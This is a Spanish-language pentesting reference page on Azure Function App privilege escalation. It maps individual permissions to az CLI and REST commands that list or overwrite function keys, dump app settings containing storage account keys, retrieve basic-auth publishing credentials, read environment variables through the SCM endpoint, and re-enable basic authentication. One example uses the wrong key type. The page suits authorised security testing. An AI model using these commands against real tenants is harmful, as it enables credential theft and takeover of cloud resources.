Az - Functions App Privesc

Function Apps

Consulta la siguiente página para más información:

Microsoft.Web/sites/host/listkeys/action

Este permiso permite listar las claves de función, maestro y sistema, pero no la clave del host, de la función especificada con:

az functionapp keys list --resource-group <res_group> --name <func-name>

Microsoft.Web/sites/functions/listKeys/action

Este permiso permite obtener la clave de host de la función especificada con:

az rest --method POST --uri "https://management.azure.com/subscriptions/<subsription-id>/resourceGroups/<resource-group>/providers/Microsoft.Web/sites/<func-name>/functions/<func-endpoint-name>/listKeys?api-version=2022-03-01"

Microsoft.Web/sites/host/functionKeys/write

Este permiso permite crear/actualizar una clave de función para la función especificada con:

az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type functionKeys --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==

Microsoft.Web/sites/host/masterKey/write

Este permiso permite crear/actualizar una clave maestra para la función especificada con:

az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type masterKey --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==

Microsoft.Web/sites/host/systemKeys/write

Este permiso permite crear/actualizar una clave de función del sistema para la función especificada con:

az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type masterKey --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==

Microsoft.Web/sites/config/list/action

Este permiso permite obtener las variables ambientales de una función. Dentro de estas variables, podría ser posible encontrar las variables de entorno predeterminadas AzureWebJobsStorage o WEBSITE_CONTENTAZUREFILECONNECTIONSTRING que en realidad contienen una clave de cuenta para acceder al almacenamiento de blobs de la función con permisos COMPLETOS.

az functionapp config appsettings list --name <func-name> --resource-group <res-group>

Microsoft.Web/sites/publishxml/action, (Microsoft.Web/sites/basicPublishingCredentialsPolicies/write)

Este permiso permite listar todos los perfiles de publicación que básicamente contienen credenciales de autenticación básica:

# Gte creds
az functionapp deployment list-publishing-profiles \
--name basicauthenabled \
--resource-group Resource_Group_1 \
--output json

• Método SCM

Luego, puedes acceder con estas credenciales de autenticación básica a la URL SCM de tu aplicación de funciones y obtener los valores de las variables de entorno:

# Get env variables values
curl -u '<username>:<password>' \
https://<app-name>.scm.azurewebsites.net/api/settings -v

Note que el nombre de usuario SCM suele ser el carácter "$" seguido del nombre de la aplicación, así que: $<app-name>.

Y estas variables de entorno contienen la AccountKey de la cuenta de almacenamiento que almacena los datos de la aplicación de función, lo que permite controlar esa cuenta de almacenamiento.

Si ves que esas credenciales están REDACTED, es porque necesitas habilitar la opción de autenticación básica de SCM y para eso necesitas el segundo permiso (Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):

# Enable basic authentication for SCM
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/scm?api-version=2022-03-01" \
--body '{
"properties": {
"allow": true
}
}'

# Enable basic authentication for FTP
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/ftp?api-version=2022-03-01" \
--body '{
"properties": {
"allow": true
}
}'